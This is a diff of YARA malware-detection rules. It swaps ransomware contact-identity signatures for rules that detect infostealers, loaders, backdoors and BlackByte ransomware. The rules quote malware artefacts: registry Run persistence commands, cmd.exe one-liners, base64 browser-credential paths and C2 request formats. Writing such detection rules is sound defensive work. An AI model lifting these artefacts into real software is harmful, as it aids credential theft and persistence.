-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L428-L436"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8670-L8700"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ea82a3fcb1d836e1c250e9a576064e1babdb82b4970555260af2eb68726cfd16"
+		logic_hash = "c891db94df9cde9eaa6096ad68d96c7b85a9c03e255ce43ccb8543a016bd3853"
 		score = 75
-		quality = 73
-		tags = ""
+		quality = 65
+		tags = "FILE"
+		hash1 = "e391c2d3e8e4860e061f69b894cf2b1ba578a3e91de610410e7e9fa87c07304c"
 
 	strings:
-		$s1 = "jimmyneytron@tuta.io" ascii wide nocase
+		$x1 = "\\share\\kdcdll\\user641.pdb" ascii
+		$x2 = "5ADSelf@tech*7890" fullword wide
+		$kdc1 = "KdcVerifyEncryptedTimeStamp" ascii wide nocase
+		$kdc2 = "KerbHashPasswordEx3" ascii wide nocase
+		$kdc3 = "KerbFreeKey" ascii wide nocase
+		$r1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
+		$r2 = "KDC Service" fullword ascii
+		$s1 = "download//symbols//%S//%S//%S" fullword wide
+		$s2 = "c:\\windows\\system32\\kdcsvc.dll" fullword wide nocase
+		$s3 = /WinHttp(Send|Receive)(Request|Response) failed (0x%.8X)/ fullword wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of them ) or ( all of ( $kdc* ) and ( 1 of ( $x* ) or all of ( $r* ) or 2 of ( $s* ) ) ) or ( 8 of them ) or ( pe.exports ( "MainFun" ) and pe.exports ( "NetApiBufferFree" ) and pe.exports ( "BeaEngineRevision" ) and pe.exports ( "BeaEngineVersion" ) and pe.exports ( "Disasm" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DsGetDcName" ) and 2 of them ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Satana
+rule DITEKSHEN_MALWARE_Win_Chinotto : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Satana ransomware"
-		author = "ditekShen"
-		id = "a362d4ca-d475-5392-a3ac-45337425d8e7"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Chinotto"
+		author = "ditekSHen"
+		id = "e66703d4-c9c6-5bb4-9e07-11dc89b0a034"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L438-L447"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8702-L8754"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6d82e2497044518cee1b56da85f1ad6ac7934eec9ca68501932d55add4236d45"
+		logic_hash = "92f37bdc4cf17e07bb556c60e3bde4547c34f67a2fb5c806000d9cb2446adff1"
 		score = 75
 		quality = 73
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "adamadam@ausi.com" ascii wide nocase
-		$s2 = "XsrR2he2Z8un5ysGWnJ1wveZRPRS96XEoX" ascii wide
+		$x1 = "xxxchinotto" ascii wide
+		$x2 = "\\Chinotto.pdb" ascii wide
+		$x3 = { 50 4f 53 54 20 25 73 20 48 54 54 50 2f 31 2e 31
+                0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e
+                67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65
+                0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f
+                7a 69 6c 6c 61 2f 34 2e 30 28 63 6f 6d 70 61 74
+                69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b 20
+                57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20
+                53 56 31 29 0d 0a 41 63 63 65 70 74 3a 20 69 6d
+                61 67 65 2f 67 69 66 2c 20 69 6d 61 67 65 2f 78
+                2d 78 62 69 74 6d 61 70 2c 20 69 6d 61 67 65 2f
+                6a 70 65 67 2c 20 69 6d 61 67 65 2f 70 6a 70 65
+                67 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78
+                2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68
+                2c 20 2a 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67
+                75 61 67 65 3a 20 65 6e 2d 75 73 0d 0a 43 6f 6e
+                74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69
+                70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 62
+                6f 75 6e 64 61 72 79 3d 25 73 0d 0a 48 6f 73 74
+                3a 20 25 73 3a 25 64 0d 0a 43 6f 6e 74 65 6e 74
+                2d 4c 65 6e 67 74 68 3a 20 25 64 0d 0a 43 6f 6e
+                6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c
+                69 76 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72
+                6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 0d 0a
+                00 00 00 00 48 54 54 50 2f 31 2e 31 20 32 30 30
+                20 4f 4b 00 0d 0a 0d 0a 00 00 00 00 65 72 72 6f
+                72 3c 2f 62 3e }
+		$s1 = "Run /v xxxzexs /t REG_SZ /d %s /f" ascii wide
+		$s2 = "ShellExecute Error, ret" ascii wide
+		$s3 = "Run app succeed" ascii
+		$s4 = "cleartemp:" fullword ascii
+		$s5 = "wakeup:" fullword ascii
+		$s6 = "updir:" fullword ascii
+		$s7 = "regstart:" fullword ascii
+		$s8 = "chdec:" fullword ascii
+		$s9 = "cmd:" fullword ascii
+		$s10 = "error</b>" fullword ascii
+		$c1 = "Host: %s:%d" ascii wide
+		$c2 = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1)" ascii wide
+		$c3 = "Mozilla/5.0(Windows NT 10.0; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/78.0.3904.108 Safari/537.36" ascii wide
+		$c4 = "id=%s&type=hello&direction=send" ascii wide
+		$c5 = "id=%s&type=command&direction=receive" ascii wide
+		$c6 = "id=%s&type=file&direction=" ascii wide
+		$c7 = "id=%s&type=result&direction=" ascii wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 2 of ( $c* ) ) ) or 4 of ( $c* ) or 5 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Zeppelin
+
+rule DITEKSHEN_MALWARE_Win_Tardigrade : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Zeppelin ransomware"
-		author = "ditekShen"
-		id = "f3bbfcd0-c66c-589e-ae04-904314d6a869"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Tardigrade"
+		author = "ditekSHen"
+		id = "a46caaaa-2954-552a-a20f-952c47370393"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L449-L462"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8756-L8787"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "66dd92423cfac32de4bea95ad0c9594cb449dc897cc6315d782c1db6de7dc5b1"
+		logic_hash = "2bd4f23f66844a320b6bed6242ba39096f66a08affb84abd78c342d433ed9fe6"
 		score = 75
-		quality = 63
-		tags = ""
+		quality = 75
+		tags = "FILE"
+		hash1 = "c0976a1fbc3dd938f1d2996a888d0b3a516b432a2c38d788831553d81e2f5858"
+		hash2 = "966b2c7c72a28310acd58bb23af4d3c893b2afca264b2d9c0ec42db815c77487"
+		hash3 = "88be5da274df704dc7fd9882c661a0afdd35f1ce0a7145e30f51c292abd2a86b"
+		hash4 = "cf88926b7d5a5ebbd563d0241aaf83718b77cec56da66bdf234295cc5a91c5fe"
+		hash5 = "4afd9f0dde092daeac3f3e6ffb0aee06682b3dba6005d2bd1a914eefd5cc6a30"
 
 	strings:
-		$s1 = "kd8eby0@inboxhub.net" ascii wide nocase
-		$s2 = "kd8eby0@onionmail.org" ascii wide nocase
-		$s3 = "kd8eby0@nuke.africa" ascii wide nocase
-		$s4 = "uspex1@cock.li" ascii wide nocase
-		$s5 = "uspex2@cock.li" ascii wide nocase
-		$s6 = "China.Helper@aol.com" ascii wide nocase
+		$x1 = "cmd.exe /c echo kOJAdtQoDcMuogIZIl>\"%s\"&exit" fullword ascii
+		$x2 = "cmd.exe /c echo HBnBcZPeUevCDQmKGzXxYJHqpzRAbRCQCihOxiLi>\"%s\"&exit" fullword ascii
+		$x3 = "cmd.exe /c set kpUUCjoLWLZvJFc=3167 & reg add HKCU\\SOFTWARE\\EQwIobTRgsJ /v PDMXPmqSYnUx /t REG_DWORD /d 10080 & exit" fullword ascii
+		$s1 = "ReplaceFileA" ascii
+		$s2 = "FlushFileBuffers" ascii
+		$s3 = "WaitNamedPipeA" ascii
+		$s4 = "ImpersonateNamedPipeClient" ascii
+		$s5 = "RegFlushKey" ascii
+		$s6 = /cmd\.exe \/c (echo|set)/ ascii
+		$s7 = ">\"%s\"&exit" ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( 1 of ( $x* ) or 6 of ( $s* ) ) and ( pe.exports ( "DllGetClassObject" ) and pe.exports ( "DllMain" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllUnregisterServer" ) and pe.exports ( "InitHelperDll" ) and pe.exports ( "StartW" ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_STOP
+rule DITEKSHEN_MALWARE_Win_Clipbanker02 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with STOP ransomware"
-		author = "ditekShen"
-		id = "b2279a7f-a187-5a44-bf1f-87c21b3ffa4f"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects ClipBanker infostealer"
+		author = "ditekSHen"
+		id = "c2a480cf-e81b-53a2-999a-80209050e0cf"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L464-L480"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8789-L8814"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f0d902edbcbe8ff8f3a751b649554499933b06471920c86a9eea3de23890b4bc"
+		logic_hash = "51a43245b1e0b6fea874302b73bf552012c54c3f7c12b8c447c96c2ffdcc1dcb"
 		score = 75
-		quality = 57
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "gorentos@bitmessage.ch" ascii wide nocase
-		$s2 = "gorentos2@firemail.cc" ascii wide nocase
-		$s3 = "manager@mailtemp.ch" ascii wide nocase
-		$s4 = "helprestoremanager@airmail.cc" ascii wide nocase
-		$s5 = "supporthelp@airmail.cc" ascii wide nocase
-		$s6 = "managerhelper@airmail.cc" ascii wide nocase
-		$s7 = "helpteam@mail.ch" ascii wide nocase
-		$s8 = "helpmanager@airmail.cc" ascii wide nocase
-		$s9 = "support@sysmail.ch" ascii wide nocase
+		$x1 = "\\Allcome\\Source code\\Clipper\\" ascii nocase
+		$x2 = "\\cleaper\\Release\\cleaper.pdb" ascii nocase
+		$v1_1 = "&username=" fullword ascii
+		$v1_2 = "/card.php?data=" fullword ascii
+		$v1_3 = "/Create /tn MicrosoftDriver /sc MINUTE /tr" fullword ascii
+		$v1_4 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0" fullword ascii
+		$v1_5 = "/API/Clipper/ykesqk0o.php?cf6zrlhn=" fullword ascii
+		$v1_6 = "&di7ztth6=" fullword ascii
+		$v1_7 = "/API/Clipper/hr627gzk.php?v6etwxo5=" fullword ascii
+		$v2_1 = "bitcoincash:" fullword ascii
+		$v2_2 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" ascii
+		$re1 = "^[0-9]{16}$" fullword ascii
+		$re2 = "^[0-9]{4}\\s[0-9]{4}\\s[0-9]{4}\\s[0-9]{4}" fullword ascii
+		$re3 = "^\\d{2}\\D\\d{2}" fullword ascii
+		$re4 = "^[0-9]{3}" fullword ascii
+		$re5 = "([\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?)" fullword ascii
+		$re6 = "(\\d{2}\\D\\d{2})" fullword ascii
+		$re7 = "(\\d{3})" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 5 of ( $v1* ) or all of ( $v2* ) ) ) or ( 3 of ( $re* ) and ( 2 of ( $v1* ) or 2 of ( $v2* ) ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Diavol
+rule DITEKSHEN_MALWARE_Win_Badjoke : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Diavol ransomware"
-		author = "ditekShen"
-		id = "ea499318-ed5b-5597-8f9f-4ece7942cf4b"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects BadJoke / Witch"
+		author = "ditekSHen"
+		id = "082727d5-618f-542d-93ca-ba93be16cd80"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L482-L491"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8816-L8831"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c72f4d7854f7ba813c4872d47aad69edb8c2927f380b9213ced1aca52454eee5"
+		logic_hash = "4699a772bcd50d2fe43740df59a4c56598ba43ebcc18acbf8ec401b6f5a01fe6"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "/noino.5fws6uqv5byttg2r//:sptth" ascii wide nocase
-		$s2 = "https://r2gttyb5vqu6swf5.onion/" ascii wide nocase
+		$s1 = "msdownld.tmp" fullword ascii
+		$s2 = "UPDFILE%lu" fullword ascii
+		$s3 = "Command.com /c %s" fullword ascii
+		$s4 = "launch.cmd" fullword ascii
+		$s5 = "virus.vbs" fullword ascii
+		$s6 = "virus.py" fullword ascii
+		$m1 = "Message from Google Virus" ascii
+		$m2 = "you cannot get rid of this virus" ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $m* ) or all of ( $s* ) or ( 1 of ( $m* ) and 2 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Chaos
+rule DITEKSHEN_MALWARE_Win_Heracles : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Chaos ransomware"
-		author = "ditekShen"
-		id = "18476655-1468-569e-b518-ebeaf289fbd6"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Heracles infostealer"
+		author = "ditekSHen"
+		id = "36cb9366-c70b-5117-955f-402f87f3a88c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L493-L511"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8833-L8861"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6e8dce1622dbccca6aa15040b49fc9ea05ec7192f8a79409fd7414690102d09a"
+		logic_hash = "1d5c80c084f9d6e4692a18f74574179095ecdd5eaadd70b5d16c19702761d74f"
 		score = 75
-		quality = 67
-		tags = ""
+		quality = 73
+		tags = "FILE"
 
 	strings:
-		$s1 = "anenomous31@gmail.com" ascii wide nocase
-		$s2 = "daengsocietyteam@gmail.com" ascii wide nocase
-		$s3 = "RansHelp@tutanota.com" ascii wide nocase
-		$s4 = "18vhBpgPhZrjJkbuT2ZyUXAnJavaJcTwEd" ascii wide
-		$s5 = "bc1qlnzcep4l4ac0ttdrq7awxev9ehu465f2vpt9x0" ascii wide
-		$s6 = "8AFtPnreZp28xoetUyKiQvVtwrov9PtEbMyvczdNZpBN45EUbEsrE8xYVp4NNqPrtxNjQwn3PbW3FG16EPYcPpKzMU78xN6" ascii wide
-		$s7 = "bc1qu6tharwawwny28z9fj6nrxg5cqftaep9ap6z2v" ascii wide
-		$s8 = "bambolina2021@virgilio.it" ascii wide nocase
-		$s9 = "1EoyuvcXdAQQvStkoJZ38vdGm84StD7wjm" ascii wide
-		$s10 = "1G395PJs8ciqvXPZEYb1LfUGPix9h9n3oQ" ascii wide
+		$x1 = "aHR0cHM6Ly9uYWNrZXIudG9hbnNlY3UuY29tL3VwbG9hZHM/a2V5PX" wide
+		$b1 = "XEdvb2dsZVxDaHJvbWVc" wide
+		$b2 = "XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3Nlcl" wide
+		$b3 = "XENvY0NvY1xCcm93c2VyX" wide
+		$b4 = "VXNlciBEYXRh" wide
+		$b5 = "RGVmYXVsdA" wide
+		$b6 = "UHJvZmlsZQ" wide
+		$b7 = "Q29va2llcw" wide
+		$b8 = "TG9naW4gRGF0YQ" wide
+		$b9 = "TG9jYWwgU3RhdGU" wide
+		$b10 = "bG9jYWxzdGF0ZQ" wide
+		$b11 = "bG9naW5kYXRh" wide
+		$s1 = "encrypted_key" fullword wide
+		$s2 = "<GetIpInfoAsync>d__" ascii
+		$s3 = "<reqHTML>5__" ascii
+		$s4 = "<idHardware>5__" ascii
+		$s5 = "<profilePaths>5__" ascii
+		$s6 = "<cookieFile>5__" ascii
+		$s7 = "<loginDataFile>5__" ascii
+		$s8 = "<localStateFile>5__" ascii
+		$s9 = "<postData>5__" ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 8 of ( $s* ) or ( 4 of ( $b* ) and 4 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Maze
+rule DITEKSHEN_MALWARE_Win_Onlylogger : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Maze ransomware"
-		author = "ditekShen"
-		id = "7cc11912-e5d2-5477-ab9b-0c470bb5e1d6"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects OnlyLogger loader variants"
+		author = "ditekSHen"
+		id = "525aa2a0-5090-5f96-999b-67ca4379f897"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L513-L521"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8863-L8882"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "46070d46c502837e5fb87d0fb75244a1a21e90b4e0ce4b73c408b8dc67fe1bcb"
+		logic_hash = "1b39a4d2a6d3a2633cfa98adc1dfe99d10d2493fd06c9f875c56ec7689b7a561"
 		score = 75
-		quality = 73
-		tags = ""
+		quality = 25
+		tags = "FILE"
 
 	strings:
-		$s1 = "getmyfilesback@airmail.cc" ascii wide nocase
+		$s1 = { 45 6c 65 76 61 74 65 64 00 00 00 00 4e 4f 54 20 65 6c 65 76 61 74 65 64 }
+		$s2 = "\" /f & erase \"" ascii
+		$s3 = "/c taskkill /im \"" ascii
+		$s4 = "KILLME" fullword ascii
+		$s5 = "C:\\Windows\\System32\\cmd.exe" fullword ascii
+		$gn = ".php?pub=" ascii
+		$ip = /\/1[a-z0-9A-Z]{4,5}/ fullword ascii
+		$h1 = "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1" fullword ascii
+		$h2 = "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8" fullword ascii
+		$h3 = "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1" fullword ascii
+		$h4 = "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0" fullword ascii
+		$h5 = "Content-Type: application/x-www-form-urlencoded" fullword wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( #ip > 5 and ( $gn or 3 of ( $s* ) or all of ( $h* ) ) ) or ( all of ( $h* ) and 3 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lokilocker
+rule DITEKSHEN_MALWARE_Win_Blackbytego : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with LokiLocker ransomware"
-		author = "ditekShen"
-		id = "ab2cf390-4544-54ed-913c-d463d0f1bdb0"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects BlackByte ransomware Go variants"
+		author = "ditekSHen"
+		id = "25431446-8cce-54cc-925d-5d9147344c6d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L523-L531"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8884-L8904"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ab9a2ce7e39d916b389e2adb975e3558ddb7d87f7e9494e6b20cb25edd3cb84"
+		logic_hash = "b3e6a4a2f043293e8693cfbe1515681ce0616d98e2492732fc06a01a96309883"
 		score = 75
-		quality = 73
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "Unlockpls.dr01@yahoo.com" ascii wide nocase
+		$x1 = "BlackByteGO/_cgo_gotypes.go" fullword ascii
+		$x3 = "BlackByteGO/" ascii nocase
+		$s1 = ".Disconnect" ascii
+		$s2 = ".OpenService" ascii
+		$s3 = ".ListServices" ascii
+		$s4 = ".Start" ascii
+		$s5 = ".Encrypt" ascii
+		$s6 = ".Decrypt" ascii
+		$s7 = ".MustFindProc" ascii
+		$s8 = ".QuoRem" ascii
+		$s9 = "C:\\Windows\\regedit.exe" fullword wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Blackcat
+rule DITEKSHEN_MALWARE_Win_Vulturi : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with BlackCat ransomware"
-		author = "ditekShen"
-		id = "21038f8e-73cd-59d2-9eb3-6947d263ab79"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Vulturi infostealer"
+		author = "ditekSHen"
+		id = "dca814d6-ca26-5315-9f80-628ee50e8dfa"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L533-L569"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8906-L8931"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eb0a4d26170f030775f778cc524749ca283dfa983f84bd364e4df6321eb96cf1"
+		logic_hash = "4d1d88764dd72ae78a74b802e11c2f28899b7b9f45c54cf3bf7aaac49dd48d7f"
 		score = 75
-		quality = 73
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$pk1 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0B0ni9tyKHSJmU6gc1iRwNTklYocRKmLPUyOthUIHnZHwL1M2pKlMBwXx81bboVS6Cf8YaCoWW1bCmLwPX421sG22xkmtMy/SfiG8jaYtYiA7r7hOdIUnJgRo6vDvNafZlSD32tFVVjuX8Ec79qj2FM7/MmNcseUgpIQaEACuZcSzMK+jZA4BLT9b5Akkec2hPOXGTPmgaXjL9EJE+0rhNZcm/m6xe4/S5eL2kSCVsNUeG8xWuSO2kDRS8xY3rtJOCNEdqZp1rxzTkhgj3hHqr7AoFAkxNblQ538JcdF5+CGINxckA/ldmP7wQd92tmFk2vcl2WeQykFwMM6L6MsQwIDAQAB" ascii wide
-		$pk2 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA49gzJwP9UwEuYQZT1cdgSpxG6z8TVNLPfS4Qwd3vpWHEOAuvi8JGVEpHPGZnrD1QFoDLSTva3PZ4mqtIVO79GOYb5uQkP7LdJGWbLAjUGptVGmB67jKOOLLrjmuBDHpJXSOGG/vw5vajr4MhNnsvoBLPOC0AOzPM6GBDgKdC9zdUGNEreAjOR4neqwZ2jfYl5k5e3eRF86hmWhGXJQaU1uTmDJwgQIzmUZKo+YCfAHbEbSA4HhsumJfw0MJN7RfKPEQkEVvRIBibHnJuIp1bxk3IGPzTCbyQLHMVLz8wgElEexu8/aO3FT6w4uPY3qD+r2W+ri7xIdEN/pTz6TBKvwIDAQAB" ascii wide
-		$pk3 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8tKPNFCbU5Unr9jxlTk4RmUdVhcRydJFts6hMpLzcAXIR2yxiNC0QiF4UovAIpGwX6kxOW7kOaOvABJQP6QENMNSg030VlLoTP+ndfFwIt+X+RUflG4UWPE8yu+kzGpCwp7UjX+hD/SpFbSFRRh3BvL3vEq04DzE0AzifEBE4yxKpLsrMsXyZzWy9Nza8NTO2jrBxoEVM2xCLkULp0wZEPDwgeKGkoxMzqavVWBC+Vxi0atKstbo7/TloNenPagl/eUErk9C8tT67zKgbEh3TFtREgaxa/yrjBvN48BU8JGGxLxy4AeGF0vOUdD0WkJsWYzLVg21ApgJaCDr5zDPuQIDAQAB" ascii wide
-		$pk4 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEApw3tWdMaWJvNf2Mejy5H0Y6kuj+lstNpwFyismGDEYhWKPps9c68xl+84o6uLKfqPzNvLnSxlVa6DitcJGeKJEQkzN+C1e1KsfzM63jHybREB2hs+dHbqBq4dbamIQcTrrr4mKzuHJ7aok4mlpRx2Un1XOJaodoV7xOHO7ui5v6uK39MJ3rvitSEBvv5oI0WDlp3IFmtd6UM6r2nygY1ncAUuasalZgF1Vaz7VXOWyX2ReQHbYWWRCR1qyKMQcBtjT5POXx9B8ek1pnU4p65kGe9M794Bhhh20GN24gY5a+zwXwstaNTO9luwd4xjjRQAVsDgjrjkzti27G11ICn6wIDAQAB" ascii wide
-		$pk5 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq8kj5LQJngPsY7AhTaJsUXc5FrSGeKS5gw5PIqk2QPM9TY6+us8TRRzWZ7rGk1zns2klpzpRMUzLIqB8lpCkJjqkOUGfgqs+HN4VIOpoJgFY897xstJCxTc+8pYQEsSqClxJllscU0okkLSQqndIR2Gznlg3qfcwyncJAFBInyqM+L4kbwCQZ6x5HNiLe2lJn8RP2aDiMI+RS1uLYron2G7rxDTUQnxThMtgLAeko8ulaB3TpB0g4lmHCenkEZeBNs81986+MjHnv7KkiscZ7ZrezKjNaIxRs8BAcD9y+Q9QQxCvZMS01ITNXcgiItbA4dsGq1fPJ42yBkkiIodsEQIDAQAB" ascii wide
-		$pk6 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqEoytNrMZRoqyIsFpcjiqVWpuV+cC9jS1umXNg/AnJF/xE7LONAmb1p8Dsx1igIUd65IXfFUxmJjFO5hf8LIBzvjUbBll4lbSgGTAUHa3Jbmr/imle6QftmY32J7dDb4WuJUOx+vLNT0I72CESiyotSzwgvLwjyubTmzTJMkqviYOcgDj45NVOx669cG6FWEaJo3PUZzRx9LS6pkOn8tW+W4NzmHMcrma+LOakan7NU6Khv5Hf5ARNsAA+KvDfP1WXJ/VsLXj6x8SdX0v2iS+y58ehUUmlxc8HNsYdOGFwrwYX9zLyJDedsbPg02c4AE4KXt8vH4+j4lVFtruSy4vwIDAQAB" ascii wide
